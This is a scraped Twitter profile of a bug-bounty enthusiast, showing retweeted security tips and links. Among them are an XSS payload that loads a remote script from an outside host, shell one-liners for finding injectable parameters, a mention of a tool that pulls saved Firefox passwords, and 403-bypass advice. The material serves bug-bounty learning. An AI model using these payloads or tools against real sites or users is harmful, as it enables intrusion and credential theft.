XploitNation (@0xswayamm) 's Twitter Profile
XploitNation

@0xswayamm

18 | Learning |
Security Researcher 👨‍💻 | Bug Hunter |
CyberSecurity Enthusiast

ID: 1587360668491341824

calendar_today01-11-2022 08:28:25

677 Tweet

110 Takipçi

1,1K Takip Edilen

Hacksparo 🥷👾 (@hack_sparo) 's Twitter Profile Photo

This tool can extract all saved passwords from Firefox, including website, username, and password, using just the Firefox profile directory.

N$ (@nav1n0x) 's Twitter Profile Photo

Subowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Azure etc. github.com/ifconfig-me/su…

VAIDIK PANDYA (@h4x0r_fr34k) 's Twitter Profile Photo

XSS on 403 Page Few Blogs about 403 XSS 1. medium.com/@Hacker_Yogi/h… 2. infosecwriteups.com/403-forbidden-… 3. labs.cognisys.group/posts/An-Intre… 4. github.com/HelloZeroNet/Z… 5. terryalanunlimited.com/xss-403-forbid…

Gudetama (@gudetama_bf) 's Twitter Profile Photo

Finding Hidden Parameter & Potential XSS with Arjun + KXSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss #bugbountytips #bugbounty

Finding Hidden Parameter &amp; Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun &amp;&amp; cat arjun | awk -F'[?&amp;]' '{baseUrl=$1; for(i=2; i&lt;=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss

#bugbountytips #bugbounty
Tushar Verma 🇮🇳 (@e11i0t_4lders0n) 's Twitter Profile Photo

Hit a 403? Don’t stop there. Try path fuzzing, header manipulation, or even using tools like Burp Suite to test alternate methods (like POST instead of GET). Bypassing 403s often reveals juicy, hidden endpoints! #bugbounty #bugbountytip #bugbountytips

Hit a 403? Don’t stop there. Try path fuzzing, header manipulation, or even using tools like Burp Suite to test alternate methods (like POST instead of GET). Bypassing 403s often reveals juicy, hidden endpoints!
#bugbounty #bugbountytip #bugbountytips
𝕏 Bug Bounty Writeups 𝕏 (@bountywriteups) 's Twitter Profile Photo

🚨 XSS from javascript hidden params by N0t0d4y assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e

Sachin 🇮🇳 (@shinchina_) 's Twitter Profile Photo

🔥🔥🔥 anveshan all in one script for your recon process. It finds - Subdomains - URLs - JS-Files - Screenshots - Ports - Secrets [inside js files] Link : github.com/hackersthan/an… #bugbounty #recon #CyberSecurity 🔥🔥🔥

7h3h4ckv157 (@7h3h4ckv157) 's Twitter Profile Photo

Launch Your Cybersecurity Career at $0 cost List made by: Bornunique911 accesscyber.co github.com/rezaduty/cyber… github.com/Aksheet10/Cybe… github.com/gracenolan/Not… hextree.io tryhackme.com/r/resources/bl… tryhackme.com/r/resources/bl…

KNOXSS (@kn0x55) 's Twitter Profile Photo

The Best 🏆 Simple #XSS Payload <Img Src=//X55.is OnLoad=import(src)> Why? 🤔 1⃣ It loads a remote script 📜 2⃣ It pops in SOURCE and DOM 🛠️ 3⃣ It allows custom code in URL hash ❤️‍🔥 #hack2learn ✨

The Best 🏆 Simple #XSS Payload

&lt;Img Src=//X55.is OnLoad=import(src)&gt;

Why? 🤔

1⃣ It loads a remote script 📜
2⃣ It pops in SOURCE and DOM 🛠️
3⃣ It allows custom code in URL hash ❤️‍🔥

#hack2learn ✨
𝕏 Bug Bounty Writeups 𝕏 (@bountywriteups) 's Twitter Profile Photo

📚 Path - Linux log files 📚 /var/log/messages /var/log/syslog /var/log/kern.log /var/log/dmesg /var/log/auth.log /var/log/dpkg.log /var/log/yum.log /var/log/boot.log /var/log/secure /var/log/Xorg.0.log /var/log/apache2/access.log /var/log/httpd/access_log

Sayedv2 🕷️ (@sayed_v2) 's Twitter Profile Photo

I'm excited to share a recent business logic vulnerability I discovered in a public bug bounty program. Here is the writeup : sayedv2.medium.com/business-logic… #bugbounty #cybersecurity

VAIDIK PANDYA (@h4x0r_fr34k) 's Twitter Profile Photo

One Liners and Bug bounty ? Here are 7 blogs about One Liners to learn more about them 1. sherwyn-moodley.medium.com/possible-a-bet… 2. medium.com/@qaafqasim/pow… 3. th3m4rk5man.medium.com/one-liners-you… 4. systemweakness.com/essential-one-… 5. systemweakness.com/a-new-way-to-c… 6. infosecwriteups.com/cors-one-liner… 7.